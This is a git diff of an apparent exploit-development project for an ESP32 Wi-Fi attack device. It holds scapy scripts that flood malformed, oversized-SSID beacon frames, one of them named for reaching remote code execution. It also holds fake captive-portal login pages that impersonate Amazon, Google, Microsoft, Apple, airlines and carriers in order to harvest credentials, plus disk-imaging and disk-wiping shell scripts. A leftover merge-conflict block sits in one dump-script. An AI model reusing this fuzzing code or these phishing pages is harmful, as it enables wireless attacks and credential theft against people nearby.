len=RawVal(listedLen)) + else: + essid = Dot11Elt(ID='SSID',info=RawVal(SSID), len=listedLen) + frame = RadioTap()/dot11/beacon/essid + sendp(frame, iface=iface, inter=interval, count=repeat) + +def sendRandBytesBeacons(numOfBeacons=200, + lenOfSSIDs=20, + repeat=3, + interval=0.100): + for i in range(numOfBeacons): + SSID = randbytes(lenOfSSIDs) + urlEncoded = urllib.parse.quote(SSID) + print(f"\n{i} of {numOfBeacons}\n\tRepeats: {repeat}\n\tLength: {lenOfSSIDs}\n\tSSID: {urlEncoded}\n") + sendProbe(SSID, repeat, interval) + +def sendRandBytesBeaconsRaw( + SSID='I-am-your-pony-waifu', + numOfBeacons=200, + lenOfSSIDs=255, + listedLen=255, + lenOverridei=False, + repeat=1, + interval=0.2): + + for i in range(numOfBeacons): + #SSID = randbytes(lenOfSSIDs) + urlEncoded = urllib.parse.quote(SSID) + print(f"\n{i} of {numOfBeacons}\n\tRepeats: {repeat}\n\tListed Length: {listedLen}\n\tReal Length: {lenOfSSIDs}\n\tInterval: {interval} Seconds\n\tSSID: {urlEncoded}") + sendProbeRaw(SSID, repeat, interval, listedLen, lenOverride=lenOverridei) + +def overloadParamBeacon(max=10000, + repeat=3, + chari = "X", + interval=0.2, + listedLen=1): + + for i in range(max): + num = i+1000 + SSIDI = chari*num + SSID = f"{num}{SSIDI}" + + dot11 = Dot11(type=0, + subtype=8, + addr1='ff:ff:ff:ff:ff:ff', + addr2=sender, + addr3=sender) + + beacon = Dot11Beacon() + + essid = Dot11Elt(ID='SSID', + info=RawVal(SSID), + len=listedLen) + + frame = RadioTap()/dot11/beacon/essid + + print(f"\nSending {num}{chari}*{num} as SSID With Length Of {listedLen}") + sendp(frame, iface=iface, inter=interval, count=repeat) + +#overloadParamBeacon() + + + +#$sendRandBytesBeaconsRaw( +# SSID = b"YOU-SEEM-FUNDAMETALLY-FUN\x00\x0AI-THINK-ID-LIKE-TO-KNOW-YOU\x00\x0AI-FEEL-LIKE-BEING-YOUR-FRIEND\x00\x0AI-AM-YOUR-PONY-WAIFU", +# numOfBeacons=200, +# lenOfSSIDs=2, +# listedLen=1, +# lenOverridei=True, +# repeat=3, +# interval=0.1) + +def bullyForRCE(max=10000, + repeat=3, + chari = "\xff", + interval=0.2, + listedLen=255): + + for i in range(max): + chars = chari*i + #SSID = f"n-{i}-YOU-SEEM-FUNDAMETALLY-FUN-I-THINK-ID-LIKE-TO-KNOW-YOU{chars}\xc6\x54\x00-I-FEEL-LIKE-BEING-YOUR-FRIEND-I-AM-YOUR-PONY-WAIFU" + SSID = f"n{chars}" + urlEncoded = urllib.parse.quote(SSID) + + dot11 = Dot11(type=0, + subtype=8, + addr1='ff:ff:ff:ff:ff:ff', + addr2=sender, + addr3=sender) + + beacon = Dot11Beacon() + + essid = Dot11Elt(ID='SSID', + info=RawVal(SSID), + len=listedLen) + + frame = RadioTap()/dot11/beacon/essid + + print(f"\nSending {i}/{max}\n\tWith SSID {urlEncoded}\n\tWith Length Of {listedLen}") + sendp(frame, iface=iface, inter=interval, count=repeat) + +sendProbeRaw(repeat=300) +#bullyForRCE() +#sendRandBytesBeacons(100, 20, 5, 0.1) diff --git a/scapy/wifi-beacon-scapy.py b/scapy/wifi-beacon-scapy.py old mode 100644 new mode 100755 index 0d93b45..c6e5a0d --- a/scapy/wifi-beacon-scapy.py +++ b/scapy/wifi-beacon-scapy.py @@ -1,30 +1,30 @@ -from scapy.all import * - -# https://yasoob.me/2018/09/08/sending-sniffing-wlan-beacon-frames-using-scapy/ - -iface = 'wlan1' -sender = 'c2:13:37:c2:13:37' - -def beacon_raw(SSID, length=255): - dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=sender, addr3=sender) - beacon = Dot11Beacon() - essid = Dot11Elt(ID='SSID',info=RawVal(SSID), len=length) - frame = RadioTap()/dot11/beacon/essid - sendp(frame, iface=iface, inter=0.250, loop=1) -# sendp(frame, iface=iface, inter=0.100, count=256) - -def beacon_normie(SSID): - dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=sender, addr3=sender) - beacon = Dot11Beacon() - essid = Dot11Elt(ID='SSID',info=SSID, len=len(SSID)) - frame = RadioTap()/dot11/beacon/essid - print(SSID) - sendp(frame, iface=iface, inter=0.100, loop=1) -# sendp(frame, iface=iface, inter=0.100, count=256) - -#longgg = "\xFF"*800 -#longggg = f"\x00{longgg}\x00" -#beacon_raw(longggg) -#SSID = b"YOU-SEEM-FUNDAMETALLY-FUN\x00\x0AI-THINK-ID-LIKE-TO-KNOW-YOU\x00\x0AI-FEEL-LIKE-BEING-YOUR-FRIEND\x00\x0AI-AM-YOUR-PONY-WAIFU\x0a\x00\xc6\x54\x00" -SSID = b"YOU-SEEM-FUNDAMETALLY-FUN-I-THINK-ID-LIKE-TO-KNOW-YOU\x0a\x00\xc6\x54\x00-I-FEEL-LIKE-BEING-YOUR-FRIEND-I-AM-YOUR-PONY-WAIFU" -beacon_raw(SSID) +from scapy.all import * + +# https://yasoob.me/2018/09/08/sending-sniffing-wlan-beacon-frames-using-scapy/ + +iface = 'wlan1' +sender = 'c2:13:37:c2:13:37' + +def beacon_raw(SSID, length=255): + dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=sender, addr3=sender) + beacon = Dot11Beacon() + essid = Dot11Elt(ID='SSID',info=RawVal(SSID), len=length) + frame = RadioTap()/dot11/beacon/essid + sendp(frame, iface=iface, inter=0.250, loop=1) +# sendp(frame, iface=iface, inter=0.100, count=256) + +def beacon_normie(SSID): + dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=sender, addr3=sender) + beacon = Dot11Beacon() + essid = Dot11Elt(ID='SSID',info=SSID, len=len(SSID)) + frame = RadioTap()/dot11/beacon/essid + print(SSID) + sendp(frame, iface=iface, inter=0.100, loop=1) +# sendp(frame, iface=iface, inter=0.100, count=256) + +#longgg = "\xFF"*800 +#longggg = f"\x00{longgg}\x00" +#beacon_raw(longggg) +#SSID = b"YOU-SEEM-FUNDAMETALLY-FUN\x00\x0AI-THINK-ID-LIKE-TO-KNOW-YOU\x00\x0AI-FEEL-LIKE-BEING-YOUR-FRIEND\x00\x0AI-AM-YOUR-PONY-WAIFU\x0a\x00\xc6\x54\x00" +SSID = b"YOU-SEEM-FUNDAMETALLY-FUN-I-THINK-ID-LIKE-TO-KNOW-YOU\x0a\x00\xc6\x54\x00-I-FEEL-LIKE-BEING-YOUR-FRIEND-I-AM-YOUR-PONY-WAIFU" +beacon_raw(SSID) diff --git a/scapy/wifi-beacon-scapy2.py b/scapy/wifi-beacon-scapy2.py old mode 100644 new mode 100755 index 29b5ae1..171868b --- a/scapy/wifi-beacon-scapy2.py +++ b/scapy/wifi-beacon-scapy2.py @@ -1,25 +1,25 @@ -from scapy.all import * - -iface = 'wlan1' -sender = 'ac:cb:12:ad:58:27' - -def beacon_raw(SSID, length=255): - dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=sender, addr3=sender) - beacon = Dot11Beacon() - essid = Dot11Elt(ID='SSID',info=RawVal(SSID), len=length) - frame = RadioTap()/dot11/beacon/essid - sendp(frame, iface=iface, inter=0.250, loop=1) -# sendp(frame, iface=iface, inter=0.100, count=256) - -def beacon_normie(SSID): - dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=sender, addr3=sender) - beacon = Dot11Beacon() - essid = Dot11Elt(ID='SSID',info=SSID, len=len(SSID)) - frame = RadioTap()/dot11/beacon/essid - sendp(frame, iface=iface, inter=0.250, loop=1) -# sendp(frame, iface=iface, inter=0.100, count=256) - -longgg = "\xFF"*800 -longggg = f"\x00{longgg}\x00" -#beacon_raw(longggg) -beacon_normie(b"\xFF\x00\xFF\x00\xFF\x00\xFF\x00\xFF\x00") +from scapy.all import * + +iface = 'wlan1' +# sender = 'ac:cb:12:ad:58:27' + +def beacon_raw(SSID, length=255): + dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=sender, addr3=sender) + beacon = Dot11Beacon() + essid = Dot11Elt(ID='SSID',info=RawVal(SSID), len=length) + frame = RadioTap()/dot11/beacon/essid + sendp(frame, iface=iface, inter=0.250, loop=1) +# sendp(frame, iface=iface, inter=0.100, count=256) + +def beacon_normie(SSID): + dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=sender, addr3=sender) + beacon = Dot11Beacon() + essid = Dot11Elt(ID='SSID',info=SSID, len=len(SSID)) + frame = RadioTap()/dot11/beacon/essid + sendp(frame, iface=iface, inter=0.250, loop=1) +# sendp(frame, iface=iface, inter=0.100, count=256) + +longgg = "\xFF"*800 +longggg = f"\x00{longgg}\x00" +#beacon_raw(longggg) +beacon_normie(b"\xFF\x00\xFF\x00\xFF\x00\xFF\x00\xFF\x00") diff --git a/sd-card-helpers/dump-script b/sd-card-helpers/dump-script new file mode 100755 index 0000000..0acf5cc --- /dev/null +++ b/sd-card-helpers/dump-script @@ -0,0 +1,23 @@ +#!/bin/bash +number=2 +tag=incremental-overrun-nullbyte +blocks=32 +blocksize=1M +dumpsize=32M + + + +echo -e "\nListing Disks" +lsblk +echo -e "\nEnter disk (e.x. sda or sdb - BE CAREFUL)" +read disk +block=/dev/$disk + +timestamp=$(date "+%d%m%Y-%H.%M.%S-%Z") + +filename="/home/kali/marauderexploitdev/imgs/${number}-${tag}-${dumpsize}-${timestamp}.img" + +echo -e "\nWriting to ${filename}" +sudo dd if=$block of=$filename bs=$blocksize count=$blocks status=progress conv=fdatasync + +echo -e "\n\nDONE\n\nWritten to: ${filename}\n\n" diff --git a/sd-card-helpers/imgs/0-full-fuzz-100M-27092024-21.54.44-UTC.img b/sd-card-helpers/imgs/0-full-fuzz-100M-27092024-21.54.44-UTC.img old mode 100644 new mode 100755 diff --git a/sd-card-helpers/imgs/2-incremental-overrun-nullbyte-32M-27092024-20.41.37-UTC.img b/sd-card-helpers/imgs/2-incremental-overrun-nullbyte-32M-27092024-20.41.37-UTC.img old mode 100644 new mode 100755 diff --git a/sd-card-helpers/mount-marauder-sd b/sd-card-helpers/mount-marauder-sd new file mode 100755 index 0000000..835a831 --- /dev/null +++ b/sd-card-helpers/mount-marauder-sd @@ -0,0 +1,6 @@ +lsblk +echo -e "\nSelect A Disk (sda1, sdb1, etc)" +read disk +sudo mount /dev/$disk /mnt/MARAUDLABEL +echo -e "\n/mnt/MARAUDLABEL\n" +ls -lah /mnt/MARAUDLABEL diff --git a/sd-card-helpers/umount-marauder-sd b/sd-card-helpers/umount-marauder-sd new file mode 100755 index 0000000..998aabe --- /dev/null +++ b/sd-card-helpers/umount-marauder-sd @@ -0,0 +1 @@ +sudo umount /mnt/MARAUDLABEL diff --git a/sd-card-helpers/zero-recreate-sd b/sd-card-helpers/zero-recreate-sd new file mode 100755 index 0000000..79d13a7 --- /dev/null +++ b/sd-card-helpers/zero-recreate-sd @@ -0,0 +1,45 @@ +#!/bin/bash +mountpoint=/mnt/MARAUDLABEL/ +gb_to_zero=1 +# full_wipe=True +copy_files=True + +echo "WILL WIPE DISK USE WITH CARE" + +echo -e "\nListing Disks" +lsblk +echo -e "\nEnter disk (e.x. sda or sdb - BE CAREFUL)" +read disk +block="/dev/${disk}" + +if [ -z $full_wipe ]; then + echo -e "\nZeroing ${gb_to_zero}GB on Disk $block" + sudo dd if=/dev/zero of=$block status=progress bs=1M count="${gb_to_zero}K" conv=fdatasync +else + echo -e "\nZeroing FULL Disk $block" + sudo dd if=/dev/zero of=$block status=progress bs=32M conv=fdatasync +fi + +echo -e "\nCreating Partitions on $block" +sudo echo ',,b;' | sudo sfdisk $block +echo -e "\n\nEnter Disk (e.x. sda1 or sdb1)" +lsblk +read part +partition="/dev/${part}" +echo -e "\nMaking FAT32 Filesystem on $partition" +sudo mkfs.vfat -F 32 -n MARAUDERSD $partition +echo -e "\n$block Status:" +sudo sfdisk -l $block +echo -e "\nMounting $partition at $mountpoint" +sudo mount $partition $mountpoint +if [ ! -z $copy_files ]; then + echo -e "\nCopying Minimal Files" + sudo cp marauder_cyd_microsd/index.html $mountpoint + sudo cp marauder_cyd_microsd/ap.config.txt $mountpoint + echo -e "\nListing" + ls -lah $mountpoint + echo -e "\numounting $partition from $mountpoint" + sudo umount $mountpoint +fi +echo -e "\n\nYou May Now Use on Marauder" + diff --git a/sd-card/dump-script b/sd-card/dump-script old mode 100644 new mode 100755 index b2bd79f..043c150 --- a/sd-card/dump-script +++ b/sd-card/dump-script @@ -1,30 +1,30 @@ -#!/bin/bash -number=0 -<<<<<<< HEAD:sd-card-helpers/dump-script -tag=full-fuzz -blocks=100 -blocksize=1M -dumpsize=100M -======= -tag=fresh -blocks=75 -blocksize=1M -dumpsize=75M ->>>>>>> 74ecdcb053840a8ffeeb1fd63d6789a9f4ef29eb:sd-card/dump-script - - - -echo -e "\nListing Disks" -lsblk -echo -e "\nEnter disk (e.x. sda or sdb - BE CAREFUL)" -read disk -block=/dev/$disk - -timestamp=$(date "+%d%m%Y-%H.%M.%S-%Z") - -filename="./imgs/${number}-${tag}-${dumpsize}-${timestamp}.img" - -echo -e "\nWriting to ${filename}" -sudo dd if=$block of=$filename bs=$blocksize count=$blocks status=progress conv=fdatasync - +#!/bin/bash +number=0 +<<<<<<< HEAD:sd-card-helpers/dump-script +tag=full-fuzz +blocks=100 +blocksize=1M +dumpsize=100M +======= +tag=fresh +blocks=75 +blocksize=1M +dumpsize=75M +>>>>>>> 74ecdcb053840a8ffeeb1fd63d6789a9f4ef29eb:sd-card/dump-script + + + +echo -e "\nListing Disks" +lsblk +echo -e "\nEnter disk (e.x. sda or sdb - BE CAREFUL)" +read disk +block=/dev/$disk + +timestamp=$(date "+%d%m%Y-%H.%M.%S-%Z") + +filename="./imgs/${number}-${tag}-${dumpsize}-${timestamp}.img" + +echo -e "\nWriting to ${filename}" +sudo dd if=$block of=$filename bs=$blocksize count=$blocks status=progress conv=fdatasync + echo -e "\n\nDONE\n\nWritten to: ${filename}\n\n" \ No newline at end of file diff --git a/sd-card/marauder_microsd/AlaskaAirline.html b/sd-card/marauder_microsd/AlaskaAirline.html old mode 100644 new mode 100755 index 27ae11d..3b67e42 --- a/sd-card/marauder_microsd/AlaskaAirline.html +++ b/sd-card/marauder_microsd/AlaskaAirline.html @@ -1,89 +1,89 @@ - - - - - - - - -
-
- -
-
- - + + + + + + + + +
+
+ +
+
+ + diff --git a/sd-card/marauder_microsd/Amazon.html b/sd-card/marauder_microsd/Amazon.html old mode 100644 new mode 100755 index 44c509b..1aaf6d9 --- a/sd-card/marauder_microsd/Amazon.html +++ b/sd-card/marauder_microsd/Amazon.html @@ -1,100 +1,100 @@ - - - - - - - - -
- - - -
- -

Sign in

-

Use your Amazon Account

- -
- - - - - - - -
- -
- -
- - + + + + + + + + +
+ + + +
+ +

Sign in

+

Use your Amazon Account

+ +
+ + + + + + + +
+ +
+ +
+ + \ No newline at end of file diff --git a/sd-card/marauder_microsd/Better_Google_Mobile.html b/sd-card/marauder_microsd/Better_Google_Mobile.html old mode 100644 new mode 100755 index 3861095..ae32e82 --- a/sd-card/marauder_microsd/Better_Google_Mobile.html +++ b/sd-card/marauder_microsd/Better_Google_Mobile.html @@ -1,146 +1,146 @@ - - - - - - - - - - - - + + + + + + + + + + + + \ No newline at end of file diff --git a/sd-card/marauder_microsd/CoxWifi.html b/sd-card/marauder_microsd/CoxWifi.html old mode 100644 new mode 100755 diff --git a/sd-card/marauder_microsd/Facebook.html b/sd-card/marauder_microsd/Facebook.html old mode 100644 new mode 100755 index b75a500..038e275 --- a/sd-card/marauder_microsd/Facebook.html +++ b/sd-card/marauder_microsd/Facebook.html @@ -1,83 +1,83 @@ - - - - - - - - - - + + + + + + + + + + diff --git a/sd-card/marauder_microsd/FakeHack.html b/sd-card/marauder_microsd/FakeHack.html old mode 100644 new mode 100755 index 0f0620d..1a1376c --- a/sd-card/marauder_microsd/FakeHack.html +++ b/sd-card/marauder_microsd/FakeHack.html @@ -1,61 +1,61 @@ - - - - - - - Hacking Simulation - - -
- - - + + + + + + + Hacking Simulation + + +
+ + + diff --git a/sd-card/marauder_microsd/FakeHack2.html b/sd-card/marauder_microsd/FakeHack2.html old mode 100644 new mode 100755 index e4313a5..7b44a9c --- a/sd-card/marauder_microsd/FakeHack2.html +++ b/sd-card/marauder_microsd/FakeHack2.html @@ -1,58 +1,58 @@ - - - - Captive Portal - - - - Connect -
- - - + + + + Captive Portal + + + + Connect +
+ + + diff --git a/sd-card/marauder_microsd/Frequency.html b/sd-card/marauder_microsd/Frequency.html old mode 100644 new mode 100755 index aa130cb..08dec57 --- a/sd-card/marauder_microsd/Frequency.html +++ b/sd-card/marauder_microsd/Frequency.html @@ -1,71 +1,71 @@ - - - - Captive Portal - - - - Connect -
- - - + + + + Captive Portal + + + + Connect +
+ + + diff --git a/sd-card/marauder_microsd/Google_Modern.html b/sd-card/marauder_microsd/Google_Modern.html old mode 100644 new mode 100755 index 79b96b8..e69127f --- a/sd-card/marauder_microsd/Google_Modern.html +++ b/sd-card/marauder_microsd/Google_Modern.html @@ -1,74 +1,74 @@ - - - - - - - - - - + + + + + + + + + + diff --git a/sd-card/marauder_microsd/Jet_Blue.html b/sd-card/marauder_microsd/Jet_Blue.html old mode 100644 new mode 100755 index 21318dc..873a2f8 --- a/sd-card/marauder_microsd/Jet_Blue.html +++ b/sd-card/marauder_microsd/Jet_Blue.html @@ -1,60 +1,60 @@ - - - - - - - -
-
- -
-
- - + + + + + + + +
+
+ +
+
+ + diff --git a/sd-card/marauder_microsd/Matrix.html b/sd-card/marauder_microsd/Matrix.html old mode 100644 new mode 100755 index ab98091..546fb4d --- a/sd-card/marauder_microsd/Matrix.html +++ b/sd-card/marauder_microsd/Matrix.html @@ -1,139 +1,139 @@ - - - - - - - -
-
Register or Sign-in
-
- - - -
-
-
-
- - - + + + + + + + +
+
Register or Sign-in
+
+ + + +
+
+
+
+ + + diff --git a/sd-card/marauder_microsd/Microsoft.html b/sd-card/marauder_microsd/Microsoft.html old mode 100644 new mode 100755 index 34cdc64..2e8851a --- a/sd-card/marauder_microsd/Microsoft.html +++ b/sd-card/marauder_microsd/Microsoft.html @@ -1,77 +1,77 @@ - - - - - - - -
- -
-

Sign In with
your Microsoft account

- - - -
-
- - + + + + + + + +
+ +
+

Sign In with
your Microsoft account

+ + + +
+
+ + diff --git a/sd-card/marauder_microsd/Prank_Game.html b/sd-card/marauder_microsd/Prank_Game.html old mode 100644 new mode 100755 index 4f13658..473e5c8 --- a/sd-card/marauder_microsd/Prank_Game.html +++ b/sd-card/marauder_microsd/Prank_Game.html @@ -1,76 +1,76 @@ - - - - Guess the number to use WiFi - - - -

Guess the number to use WiFi

-

Enter a number between 0-10

- - -

- - - - + + + + Guess the number to use WiFi + + + +

Guess the number to use WiFi

+

Enter a number between 0-10

+ + +

+ + + + diff --git a/sd-card/marauder_microsd/Spectrum.html b/sd-card/marauder_microsd/Spectrum.html old mode 100644 new mode 100755 index 4ac5cd4..1959e24 --- a/sd-card/marauder_microsd/Spectrum.html +++ b/sd-card/marauder_microsd/Spectrum.html @@ -1,91 +1,91 @@ - - - - - - - -
- -

Welcome

-

Please log in using your Spectrum account

-
- - - -
-
- - + + + + + + + +
+ +

Welcome

+

Please log in using your Spectrum account

+
+ + + +
+
+ + diff --git a/sd-card/marauder_microsd/SpiritAirlines.html b/sd-card/marauder_microsd/SpiritAirlines.html old mode 100644 new mode 100755 index ab93392..ef477ec --- a/sd-card/marauder_microsd/SpiritAirlines.html +++ b/sd-card/marauder_microsd/SpiritAirlines.html @@ -1,100 +1,100 @@ - - - - - - - - - - - - - - - - + + + + + + + + + + + + + + + + diff --git a/sd-card/marauder_microsd/Starlink.html b/sd-card/marauder_microsd/Starlink.html old mode 100644 new mode 100755 index 92d02fb..acdde81 --- a/sd-card/marauder_microsd/Starlink.html +++ b/sd-card/marauder_microsd/Starlink.html @@ -1,63 +1,63 @@ - - - - - - - -
-
- -
-
- - - + + + + + + + +
+
+ +
+
+ + + diff --git a/sd-card/marauder_microsd/T_Mobile.html b/sd-card/marauder_microsd/T_Mobile.html old mode 100644 new mode 100755 index cd7d32f..4eaa197 --- a/sd-card/marauder_microsd/T_Mobile.html +++ b/sd-card/marauder_microsd/T_Mobile.html @@ -1,94 +1,94 @@ - - - - - - - - - -
- - - - -

Sign in

- -

Use your T-Mobile account

- -
- - - -
- -
- - - + + + + + + + + + +
+ + + + +

Sign in

+ +

Use your T-Mobile account

+ +
+ + + +
+ +
+ + + diff --git a/sd-card/marauder_microsd/Twitch.html b/sd-card/marauder_microsd/Twitch.html old mode 100644 new mode 100755 index e86a4d3..725c4a9 --- a/sd-card/marauder_microsd/Twitch.html +++ b/sd-card/marauder_microsd/Twitch.html @@ -1,70 +1,70 @@ - - - - - - -
- -

Welcome

- -
- - - - - -
-
- - + + + + + + +
+ +

Welcome

+ +
+ + + + + +
+
+ + diff --git a/sd-card/marauder_microsd/Twitter.html b/sd-card/marauder_microsd/Twitter.html old mode 100644 new mode 100755 index 4cb909b..5f09704 --- a/sd-card/marauder_microsd/Twitter.html +++ b/sd-card/marauder_microsd/Twitter.html @@ -1,2 +1,2 @@ - -
+ +
diff --git a/sd-card/marauder_microsd/Verizon.html b/sd-card/marauder_microsd/Verizon.html old mode 100644 new mode 100755 index 09d7909..d1e28c4 --- a/sd-card/marauder_microsd/Verizon.html +++ b/sd-card/marauder_microsd/Verizon.html @@ -1,91 +1,91 @@ - - - - - - - -
- -
- - + + + + + + + +
+ +
+ + diff --git a/sd-card/marauder_microsd/american_airline.html b/sd-card/marauder_microsd/american_airline.html old mode 100644 new mode 100755 index 3c2cadd..dc721fc --- a/sd-card/marauder_microsd/american_airline.html +++ b/sd-card/marauder_microsd/american_airline.html @@ -1,116 +1,116 @@ - - - - - - - - -
- - - -

Sign in

- -

Using your AAdvantage number or username and password.

- -
- -
- -
- -
- -
- -
- -
- -
- -
- - - + + + + + + + + +
+ + + +

Sign in

+ +

Using your AAdvantage number or username and password.

+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ + + diff --git a/sd-card/marauder_microsd/ap.config.txt b/sd-card/marauder_microsd/ap.config.txt old mode 100644 new mode 100755 index 7cf85fd..00400f7 --- a/sd-card/marauder_microsd/ap.config.txt +++ b/sd-card/marauder_microsd/ap.config.txt @@ -1 +1 @@ -Guest-WiFi +Guest-WiFi diff --git a/sd-card/marauder_microsd/apple.html b/sd-card/marauder_microsd/apple.html old mode 100644 new mode 100755 index b3cbe5a..45fe9d5 --- a/sd-card/marauder_microsd/apple.html +++ b/sd-card/marauder_microsd/apple.html @@ -1,279 +1,279 @@ - - - - - - - - Login - Apple - - - - - -
- - -
- - -
-
-
-

Sign in

-

Use your Apple ID to access the Wi-Fi

-
-
-
- -
-
- -
-
- -
- -
-

Forgot Apple ID or password?

-

Dont't have an Apple ID? Create yours now.

-
-
- -
-

Copyright © 2023 Apple Inc. All rights reserved.

-

Privacy Policy

-

Terms of Use

-
- - - + + + + + + + + Login - Apple + + + + + +
+ + +
+ + +
+
+
+

Sign in

+

Use your Apple ID to access the Wi-Fi

+
+
+
+ +
+
+ +
+
+ +
+ +
+

Forgot Apple ID or password?

+

Dont't have an Apple ID? Create yours now.

+
+
+ +
+

Copyright © 2023 Apple Inc. All rights reserved.

+

Privacy Policy

+

Terms of Use

+
+ + + diff --git a/sd-card/marauder_microsd/at&t.html b/sd-card/marauder_microsd/at&t.html old mode 100644 new mode 100755 index 6aec7e8..c007932 --- a/sd-card/marauder_microsd/at&t.html +++ b/sd-card/marauder_microsd/at&t.html @@ -1,94 +1,94 @@ - - - - - - - - -
- - - -

Sign in

- -

Use your AT&T Account to gain Access to the WiFi Network

- -
- - - - - - - -
- -
- - + + + + + + + + +
+ + + +

Sign in

+ +

Use your AT&T Account to gain Access to the WiFi Network

+ +
+ + + + + + + +
+ +
+ + \ No newline at end of file diff --git a/sd-card/marauder_microsd/detla_airline.html b/sd-card/marauder_microsd/detla_airline.html old mode 100644 new mode 100755 index a40ff71..0d2a1ba --- a/sd-card/marauder_microsd/detla_airline.html +++ b/sd-card/marauder_microsd/detla_airline.html @@ -1,115 +1,115 @@ - - - - - - -
- - - -

Sign in

- -

Using your SkyMiles number or username and password.

- -
- -
- -
- -
- -
- -
- -
- -
- -
- - + + + + + + +
+ + + +

Sign in

+ +

Using your SkyMiles number or username and password.

+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ + diff --git a/sd-card/marauder_microsd/index.html b/sd-card/marauder_microsd/index.html old mode 100644 new mode 100755 index c1a998d..a407239 --- a/sd-card/marauder_microsd/index.html +++ b/sd-card/marauder_microsd/index.html @@ -1 +1 @@ -HTMLINDEXFILE +HTMLINDEXFILE diff --git a/sd-card/marauder_microsd/southwest_airline.html b/sd-card/marauder_microsd/southwest_airline.html old mode 100644 new mode 100755 index 84ce3b9..71aaa43 --- a/sd-card/marauder_microsd/southwest_airline.html +++ b/sd-card/marauder_microsd/southwest_airline.html @@ -1,110 +1,110 @@ - - - - - - - - -
- - - -

Sign In

- -

Sign in using your Rapid Rewards number or username and password

- -
- -
- -
- -
- -
- - - -
- -
- - - + + + + + + + + +
+ + + +

Sign In

+ +

Sign in using your Rapid Rewards number or username and password

+ +
+ +
+ +
+ +
+ +
+ + + +
+ +
+ + + diff --git a/sd-card/marauder_microsd/united_airline.html b/sd-card/marauder_microsd/united_airline.html old mode 100644 new mode 100755 index d92eda3..2f09b51 --- a/sd-card/marauder_microsd/united_airline.html +++ b/sd-card/marauder_microsd/united_airline.html @@ -1,117 +1,117 @@ - - - - - - -
- - - -

Sign in

- -

Using your MileagePlus® number and password.

- -
- -
- -
- -
- -
- -
- -
- -
- -
- - + + + + + + +
+ + + +

Sign in

+ +

Using your MileagePlus® number and password.

+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ + diff --git a/sd-card/mount-marauder-sd b/sd-card/mount-marauder-sd old mode 100644 new mode 100755 index 835a831..dadaec5 --- a/sd-card/mount-marauder-sd +++ b/sd-card/mount-marauder-sd @@ -1,6 +1,6 @@ -lsblk -echo -e "\nSelect A Disk (sda1, sdb1, etc)" -read disk -sudo mount /dev/$disk /mnt/MARAUDLABEL -echo -e "\n/mnt/MARAUDLABEL\n" -ls -lah /mnt/MARAUDLABEL +lsblk +echo -e "\nSelect A Disk (sda1, sdb1, etc)" +read disk +sudo mount /dev/$disk /mnt/MARAUDLABEL +echo -e "\n/mnt/MARAUDLABEL\n" +ls -lah /mnt/MARAUDLABEL diff --git a/sd-card/umount-marauder-sd b/sd-card/umount-marauder-sd old mode 100644 new mode 100755 index 998aabe..8f82c6b --- a/sd-card/umount-marauder-sd +++ b/sd-card/umount-marauder-sd @@ -1 +1 @@ -sudo umount /mnt/MARAUDLABEL +sudo umount /mnt/MARAUDLABEL diff --git a/sd-card/zero-recreate-sd b/sd-card/zero-recreate-sd old mode 100644 new mode 100755 index 79d13a7..0b84eab --- a/sd-card/zero-recreate-sd +++ b/sd-card/zero-recreate-sd @@ -1,45 +1,45 @@ -#!/bin/bash -mountpoint=/mnt/MARAUDLABEL/ -gb_to_zero=1 -# full_wipe=True -copy_files=True - -echo "WILL WIPE DISK USE WITH CARE" - -echo -e "\nListing Disks" -lsblk -echo -e "\nEnter disk (e.x. sda or sdb - BE CAREFUL)" -read disk -block="/dev/${disk}" - -if [ -z $full_wipe ]; then - echo -e "\nZeroing ${gb_to_zero}GB on Disk $block" - sudo dd if=/dev/zero of=$block status=progress bs=1M count="${gb_to_zero}K" conv=fdatasync -else - echo -e "\nZeroing FULL Disk $block" - sudo dd if=/dev/zero of=$block status=progress bs=32M conv=fdatasync -fi - -echo -e "\nCreating Partitions on $block" -sudo echo ',,b;' | sudo sfdisk $block -echo -e "\n\nEnter Disk (e.x. sda1 or sdb1)" -lsblk -read part -partition="/dev/${part}" -echo -e "\nMaking FAT32 Filesystem on $partition" -sudo mkfs.vfat -F 32 -n MARAUDERSD $partition -echo -e "\n$block Status:" -sudo sfdisk -l $block -echo -e "\nMounting $partition at $mountpoint" -sudo mount $partition $mountpoint -if [ ! -z $copy_files ]; then - echo -e "\nCopying Minimal Files" - sudo cp marauder_cyd_microsd/index.html $mountpoint - sudo cp marauder_cyd_microsd/ap.config.txt $mountpoint - echo -e "\nListing" - ls -lah $mountpoint - echo -e "\numounting $partition from $mountpoint" - sudo umount $mountpoint -fi -echo -e "\n\nYou May Now Use on Marauder" - +#!/bin/bash +mountpoint=/mnt/MARAUDLABEL/ +gb_to_zero=1 +# full_wipe=True +copy_files=True + +echo "WILL WIPE DISK USE WITH CARE" + +echo -e "\nListing Disks" +lsblk +echo -e "\nEnter disk (e.x. sda or sdb - BE CAREFUL)" +read disk +block="/dev/${disk}" + +if [ -z $full_wipe ]; then + echo -e "\nZeroing ${gb_to_zero}GB on Disk $block" + sudo dd if=/dev/zero of=$block status=progress bs=1M count="${gb_to_zero}K" conv=fdatasync +else + echo -e "\nZeroing FULL Disk $block" + sudo dd if=/dev/zero of=$block status=progress bs=32M conv=fdatasync +fi + +echo -e "\nCreating Partitions on $block" +sudo echo ',,b;' | sudo sfdisk $block +echo -e "\n\nEnter Disk (e.x. sda1 or sdb1)" +lsblk +read part +partition="/dev/${part}" +echo -e "\nMaking FAT32 Filesystem on $partition" +sudo mkfs.vfat -F 32 -n MARAUDERSD $partition +echo -e "\n$block Status:" +sudo sfdisk -l $block +echo -e "\nMounting $partition at $mountpoint" +sudo mount $partition $mountpoint +if [ ! -z $copy_files ]; then + echo -e 